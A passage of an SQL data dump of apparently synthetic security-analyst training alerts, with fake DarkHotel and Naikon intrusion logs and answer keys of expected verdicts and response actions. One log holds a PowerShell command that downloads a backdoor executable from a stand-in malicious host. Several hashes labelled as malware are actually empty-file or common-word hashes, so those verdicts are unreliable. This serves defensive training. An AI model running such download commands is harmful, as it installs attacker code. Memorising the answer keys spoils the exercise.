Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (470, 'Exfiltration: Unusual Data Transfer Detected', 'high', 'Data Loss Prevention (DLP) Systems', 'The DLP system detected an unusual data transfer from an internal host within the industrial control network to an external IP address. This exfiltration attempt involved sensitive files related to ICS operations, indicating a successful completion of the attackers\' objective.', 'Data Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:10Z\",\"internal_ip\":\"192.168.5.23\",\"external_ip\":\"85.234.167.90\",\"filename\":\"ICS_Project_Plan.pdf\",\"file_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"user\":\"j.doe\",\"transfer_protocol\":\"HTTPS\",\"data_volume\":\"150MB\",\"detection_method\":\"Content Inspection\",\"alert_id\":\"DLP-EXFIL-20231015-001\"}', '2026-01-05 03:02:42', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.5.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host within the ICS network\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"85.234.167.90\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous cyber attacks\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"ICS_Project_Plan.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal DLP\",\"verdict\":\"suspicious\",\"details\":\"Sensitive ICS document\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No known malware associated with this hash\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal HR\",\"verdict\":\"internal\",\"details\":\"Active employee\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL), (471, 'Suspicious Wi-Fi Network Activity', 'high', 'Network traffic logs', 'DarkHotel initiated an operation by compromising a hotel\'s Wi-Fi network. The network traffic logs indicate suspicious activity from an external IP address, suggesting an attempt to gain initial access to target devices.', 'Initial Access', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:32:15Z\",\"src_ip\":\"192.168.1.105\",\"dst_ip\":\"203.0.113.45\",\"src_port\":443,\"dst_port\":8080,\"protocol\":\"HTTPS\",\"username\":\"guest_user\",\"file\":{\"filename\":\"trojan_hotel.exe\",\"hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\"},\"action\":\"connection_attempt\",\"result\":\"success\",\"log_id\":\"abcd1234\"}', '2026-01-05 03:04:49', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intel Database\",\"verdict\":\"malicious\",\"details\":\"This IP is known to be associated with DarkHotel APT group.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known DarkHotel trojan.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"trojan_hotel.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Malware Analysis Sandbox\",\"verdict\":\"malicious\",\"details\":\"Filename is commonly used in DarkHotel campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"guest_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Local Database\",\"verdict\":\"internal\",\"details\":\"Default username for hotel guests.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (472, 'Unsigned Software Update Detected', 'high', 'Endpoint security alerts', 'An advanced alert was triggered when a target device attempted to execute a software update lacking a valid signature. This indicates a potential execution of a malicious payload disguised as a legitimate software update.', 'Execution', 'T1204.002 - User Execution: Malicious File', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:27:49Z\",\"device_id\":\"WIN-192168011\",\"user\":\"jdoe\",\"filename\":\"update_v1.exe\",\"file_hash\":\"b1946ac92492d2347c6235b4d2611184\",\"file_signature_status\":\"unsigned\",\"source_ip\":\"192.168.0.11\",\"destination_ip\":\"45.76.12.34\",\"process_id\":4528,\"execution_path\":\"C:\\\\Program Files\\\\Update\\\\update_v1.exe\",\"alert_message\":\"Unsigned software update executed on endpoint\",\"external_reputation\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected by 14/60 antivirus engines\"}}', '2026-01-05 03:04:49', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"45.76.12.34\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known Command and Control servers.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected by 14/60 antivirus engines\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"update_v1.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used in phishing campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Employee active in the HR department.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (473, 'Tapaoux Malware Persistence Mechanism', 'high', 'File integrity monitoring', 'The Tapaoux malware employs advanced techniques to maintain persistence, ensuring continued access to the target device despite potential reboots or shutdowns.', 'Persistence', 'T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:48:00Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"target_ip\":\"10.0.15.21\",\"user\":\"compromised_user\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\tapaoux.dll\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"action\":\"Added to startup\",\"registry_key_modified\":\"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\TapaouxService\"}', '2026-01-05 03:04:49', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with Tapaoux malware operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.15.21\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised device.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"C:\\\\Windows\\\\System32\\\\tapaoux.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"Tapaoux malware DLL used for persistence.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hash Lookup Service\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Tapaoux malware variant.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"suspicious\",\"details\":\"User account suspected to be compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (474, 'Unauthorized Credential Access Attempt', 'high', 'Authentication logs', 'DarkHotel APT group attempts to harvest credentials from a compromised device, aiming to move laterally and access additional systems within the network. The attack was detected through unusual login attempts from an external IP address using a compromised internal account.', 'Lateral Movement', 'T1078.001 - Valid Accounts: Default Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:23:45Z\",\"event_id\":\"4625\",\"logon_type\":\"3\",\"user\":\"compromised_user\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"status\":\"FAILED\",\"failure_reason\":\"Unknown user name or bad password\",\"target_machine\":\"WIN-DC01\",\"hash\":\"e4d909c290d0fb1ca068ffaddf22cbd0\",\"filename\":\"darkhotel_tool.exe\"}', '2026-01-05 03:04:49', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with DarkHotel APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Security Logs\",\"verdict\":\"suspicious\",\"details\":\"Unusual access patterns detected.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e4d909c290d0fb1ca068ffaddf22cbd0\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Platform\",\"verdict\":\"malicious\",\"details\":\"Known hash for DarkHotel credential harvesting tool.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NULL', 1, 0, NULL), (475, 'Exfiltration of Sensitive Data', 'critical', 'Data loss prevention alerts', 'The final phase of the attack involves exfiltrating sensitive information from the executive\'s device to an external server controlled by DarkHotel, completing their malicious objectives.', 'Exfiltration', 'T1048.003 - Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45.123Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"10.0.0.25\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":\"8080\",\"protocol\":\"HTTP\",\"username\":\"jdoe_exec\",\"filename\":\"Executive_Report_Q3_2023.pdf\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"alert_source\":\"DLP\",\"threat_actor\":\"DarkHotel\",\"external_server\":\"malicious-server.example.com\"}', '2026-01-05 03:04:49', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the source device.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address associated with DarkHotel APT group.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"Executive_Report_Q3_2023.pdf\",\"is_critical\":false,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"suspicious\",\"details\":\"Sensitive document containing executive data.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"File hash matches known malicious files used by DarkHotel.\"}},{\"id\":\"artifact_5\",\"type\":\"domain\",\"value\":\"malicious-server.example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"domain_reputation\",\"verdict\":\"malicious\",\"details\":\"Domain known to be used by DarkHotel for data exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL), (476, 'Suspicious Email with Malicious RTF Attachment Detected', 'medium', 'Email Security Gateway', 'A spear-phishing email was detected targeting a regional government employee. The email contained a RoyalRoad RTF file, commonly used by Naikon APT to exploit vulnerabilities in Microsoft Word for initial access.', 'Phishing', 'T1566.001', 1, 'Closed', 1, '{\"timestamp\":\"2023-10-24T09:15:27Z\",\"email_id\":\"b7f9a85d-083f-4d6b-9c6f-f22a3fc1e9b1\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.2.15\",\"sender_email\":\"attacker@maliciousdomain.com\",\"recipient_email\":\"employee@regionalgov.org\",\"subject\":\"Urgent: Review Attached Document\",\"attachment\":{\"filename\":\"important_document.rtf\",\"hash\":\"a4b9c78cb6f1a2b3d4e5f6a7b8c9d0e1\"},\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\"}', '2026-01-05 03:08:29', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feeds\",\"verdict\":\"malicious\",\"details\":\"IP associated with Naikon APT activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of recipient.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"attacker@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Known phishing domain used by APT groups.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"employee@regionalgov.org\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate email of a regional government employee.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"a4b9c78cb6f1a2b3d4e5f6a7b8c9d0e1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Platform\",\"verdict\":\"malicious\",\"details\":\"Hash associated with RoyalRoad exploit documents.\"}},{\"id\":\"artifact_6\",\"type\":\"filename\",\"value\":\"important_document.rtf\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"Filename commonly used in spear-phishing campaigns.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'NULL', 1, 0, NULL), (477, 'Execution of Malicious Payload via RoyalRoad Exploit', 'high', 'Endpoint Detection and Response (EDR)', 'Upon opening the RTF document, the RoyalRoad exploit triggers, executing a script that downloads the Aria-body backdoor onto the target\'s system.', 'Malware Execution', 'T1203: Exploitation for Client Execution', 1, 'new', 34, '{\"timestamp\":\"2023-10-15T14:22:31Z\",\"event_id\":\"EDR-456789\",\"source_ip\":\"203.0.113.15\",\"destination_ip\":\"10.0.0.25\",\"user\":\"jdoe\",\"file_name\":\"malicious_document.rtf\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"process_executed\":\"powershell.exe -Command Invoke-WebRequest -Uri http://malicious-site.com/aria-body.exe -OutFile C:\\\\Temp\\\\aria-body.exe\",\"malware_hash\":\"4a8a08f09d37b73795649038408b5f33\",\"action_taken\":\"Quarantine\"}', '2026-01-05 03:08:29', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal network IP.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious_document.rtf\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"suspicious\",\"details\":\"File involved in RoyalRoad exploit delivery.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash linked to malicious RTF documents.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"4a8a08f09d37b73795649038408b5f33\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Aria-body malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (478, 'Aria-body Backdoor Establishes Persistence', 'medium', 'System Logs', 'The Aria-body backdoor has been detected establishing persistence by creating a scheduled task. This ensures the malware runs at system startup, maintaining access on the compromised machine.', 'Persistence Mechanism', 'T1053.005 - Scheduled Task/Job', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:07Z\",\"event_id\":4698,\"task_name\":\"\\\\Microsoft\\\\Windows\\\\Update\\\\Aria-body\",\"task_action\":\"Create\",\"task_author\":\"SYSTEM\",\"task_trigger\":\"At startup\",\"executed_by\":\"192.168.1.15\",\"malware_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"filename\":\"aria-body.exe\",\"user\":\"compromised_user\",\"source_ip\":\"203.0.113.45\"}', '2026-01-05 03:08:29', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local IP address within the internal network.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Public Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash identified as a variant of the Aria-body malware.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"aria-body.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Public Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"File associated with Aria-body backdoor malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised and used for unauthorized activities.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Beginner', 'NULL', 1, 0, NULL), (479, 'Lateral Movement Detected Across Internal Network', 'high', 'Network Traffic Analysis', 'Using stolen credentials, the attacker moves laterally within the network, targeting additional systems to widen their access and control. The attacker used RDP connections to access a critical server using the account j.doe.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-16T13:45:23Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.23\",\"protocol\":\"RDP\",\"username\":\"j.doe\",\"event\":\"Successful login\",\"hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"filename\":\"malicious.exe\"}', '2026-01-05 03:08:29', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"IP database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with previous attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal asset database\",\"verdict\":\"internal\",\"details\":\"Internal company server\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal user database\",\"verdict\":\"suspicious\",\"details\":\"Account accessed from external IP\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"malicious.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware database\",\"verdict\":\"malicious\",\"details\":\"File associated with lateral movement activities\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'beginner', 'NULL', 1, 0, NULL), (480, 'Data Exfiltration to Command and Control Server', 'high', 'Firewall Logs', 'Sensitive data has been exfiltrated from the internal network to an external command and control server. The attacker used a domain that mimics a legitimate regional government site to avoid detection. This activity is consistent with Naikon APT operations focused on espionage.', 'Data Exfiltration', 'T1041', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:37:22Z\",\"src_ip\":\"192.168.1.45\",\"dst_ip\":\"203.0.113.56\",\"src_port\":45678,\"dst_port\":443,\"protocol\":\"TCP\",\"action\":\"ALLOW\",\"hostname\":\"internal-host.local\",\"domain\":\"gov-info-update.com\",\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"username\":\"jdoe\",\"filename\":\"confidential_report.pdf\",\"event_id\":\"FW-EXFIL-20231015-001\"}', '2026-01-05 03:08:29', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal network IP.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.56\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with Naikon APT.\"}},{\"id\":\"artifact_3\",\"type\":\"domain\",\"value\":\"gov-info-update.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"domain_watch\",\"verdict\":\"suspicious\",\"details\":\"Domain mimics a legitimate government site, commonly used for phishing.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"File hash associated with malicious exfiltration tool.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"confidential_report.pdf\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"suspicious\",\"details\":\"File contains sensitive information and was involved in exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL), (481, 'Suspicious Login Detected', 'medium', 'CMS Security Logs', 'An unauthorized login attempt was detected on the news website\'s CMS. The user\'s credentials were likely harvested through a phishing email. The attempt was made from a known malicious IP address.', 'Initial Access', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-07T14:23:56Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.5\",\"username\":\"j.smith@newswebsite.com\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36\",\"login_status\":\"failed\",\"reason\":\"invalid_credentials\",\"related_email\":\"phishing_campaign@maliciousdomain.com\",\"malicious_url\":\"http://maliciousdomain.com/login\",\"hash\":\"3c3f4d4e2b5c6d7e8f9a1b2c3d4e5f6a\"}', '2026-01-05 03:22:52', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP address associated with multiple phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"j.smith@newswebsite.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Registered CMS user.\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://maliciousdomain.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"Open Source Intelligence\",\"verdict\":\"malicious\",\"details\":\"URL used in phishing campaigns to harvest credentials.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"phishing_campaign@maliciousdomain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Email address used for phishing campaigns.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"3c3f4d4e2b5c6d7e8f9a1b2c3d4e5f6a\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Hash associated with credential-stealing malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'NULL', 1, 0, NULL), (482, 'Unauthorized CMS Article Publication', 'high', 'Website Change Log', 'An unauthorized publication of articles detected on the CMS. Attackers utilized stolen credentials to disseminate false narratives aiming to influence public opinion through misinformation.', 'Execution', 'T1203 - Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T13:45:30Z\",\"event_id\":\"cms-2023-unauth-pub-002\",\"user\":\"compromised_editor\",\"ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.10.25\",\"modified_files\":[\"/var/www/cms/articles/fake-news-001.html\",\"/var/www/cms/articles/fake-news-002.html\"],\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action_taken\":\"Published\",\"timestamp_publish\":\"2023-10-15T13:44:55Z\"}', '2026-01-05 03:22:52', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous misinformation campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_editor\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Access Logs\",\"verdict\":\"internal\",\"details\":\"Username with elevated permissions used in unauthorized 